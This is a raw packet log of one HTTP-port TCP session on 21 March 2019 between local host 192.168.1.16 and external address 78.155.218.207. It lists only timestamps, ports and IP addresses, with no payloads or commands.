Mar 21, 2019 14:01:27.547378063 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547399044 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547420025 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547441006 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547461987 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.547616959 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.607626915 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607682943 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607716084 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607748985 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607779026 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607808113 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607840061 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607867956 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.607870102 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607903004 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607933998 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607964993 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.607995987 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.608026028 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.608031988 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.608057022 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.608088970 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.608135939 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.608161926 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.608165026 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.608194113 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.608266115 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.668504000 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668549061 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668570995 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668590069 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668608904 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668633938 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668657064 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668678045 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668699980 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668721914 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668740034 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.668744087 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668767929 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668791056 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668812990 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668833017 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668853998 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668874979 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668889046 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.668896914 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668920040 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668941975 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668962955 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.668981075 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.668984890 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.669006109 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.669027090 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.669047117 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.669064045 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.669068098 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.669089079 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.669152021 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.729301929 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729396105 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729424953 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729471922 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729540110 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729566097 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.729603052 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729640961 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729665041 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729700089 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.729748964 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729787111 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729815006 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.729832888 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729861021 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729887009 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729909897 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.729939938 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729964018 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729991913 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.729999065 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730019093 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.730139971 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.730180025 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730204105 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730225086 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730245113 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730267048 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.730268955 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730292082 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730314016 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730340004 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730364084 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730364084 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.730389118 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730413914 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730437994 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730458975 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.730463028 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730488062 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730514050 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730537891 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730562925 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730587006 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.730588913 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.730689049 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.791134119 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791174889 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791194916 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791213989 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791234016 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791254044 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791275024 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791296005 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791316986 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791337013 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791361094 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791380882 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791400909 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791404963 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.791425943 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791451931 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791477919 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791501999 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791527033 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791552067 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791565895 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.791575909 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791599035 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791620016 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791640997 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791661978 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791682959 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791693926 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.791707993 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791728020 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791749001 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791769028 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791790009 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791810989 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791831970 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791835070 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.791853905 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791912079 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791923046 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.791934013 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791955948 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.791975975 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.792026997 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.797384977 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.852133989 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852201939 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852230072 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852258921 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852287054 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852313042 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852324009 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.852339983 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852366924 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852397919 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852433920 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852459908 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.852461100 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852488995 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852514029 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852539062 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852567911 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852583885 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852591038 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.852610111 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852634907 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852659941 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852683067 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852690935 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.852706909 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852732897 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852768898 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852777958 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.852793932 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852818012 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852842093 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852853060 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.852868080 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852894068 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852917910 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852942944 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.852958918 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.852977991 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853001118 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853024006 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853045940 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853053093 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.853069067 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853094101 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853116989 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853140116 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853144884 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.853168011 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853182077 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853204012 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853226900 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853238106 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.853250980 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853275061 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853298903 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853326082 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853339911 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853347063 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.853364944 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853389025 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853413105 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853435993 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853444099 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.853458881 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.853532076 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.913690090 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913743973 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913769007 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913790941 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913813114 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913840055 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913861036 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913882971 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913904905 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913928986 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913952112 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.913980007 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914000988 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914022923 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914045095 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914071083 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914087057 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914109945 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914132118 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914153099 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914175034 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914202929 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914226055 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914253950 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914274931 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914582968 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914621115 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914643049 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914664030 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914685965 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914690018 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.914711952 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914735079 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914757013 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914783001 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914798021 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914822102 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914844990 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914865971 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914886951 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914910078 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914932966 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914972067 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.914994001 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915014982 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915036917 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915060043 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915086985 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915117025 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915138960 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915162086 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915184021 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915206909 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915234089 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915256023 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915281057 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.915304899 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.916480064 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.921675920 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.976229906 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976274014 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976294994 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976315022 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976341009 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976363897 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976387978 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976408005 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976434946 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976459026 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976480961 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976480007 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.976502895 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976526022 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976547956 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976578951 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976600885 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976610899 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976632118 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976651907 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976681948 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976699114 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.976705074 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976730108 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976742983 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976766109 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976785898 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976808071 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976830006 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976850033 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976871014 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976882935 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.976892948 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976917982 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976931095 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976953030 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976974010 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.976999044 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977013111 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.977020979 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977042913 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977062941 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977085114 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977106094 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977128029 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977149963 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977150917 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.977173090 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977195024 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977215052 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977236032 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977257013 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977267027 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.977277994 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977300882 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977320910 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977341890 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977364063 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977384090 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977384090 CET	49228	80	192.168.1.16	78.155.218.207
Mar 21, 2019 14:01:27.977406025 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977427006 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977447033 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977468967 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977488995 CET	80	49228	78.155.218.207	192.168.1.16
Mar 21, 2019 14:01:27.977511883 CET	80	49228	78.155.218.207	192.168.1.16
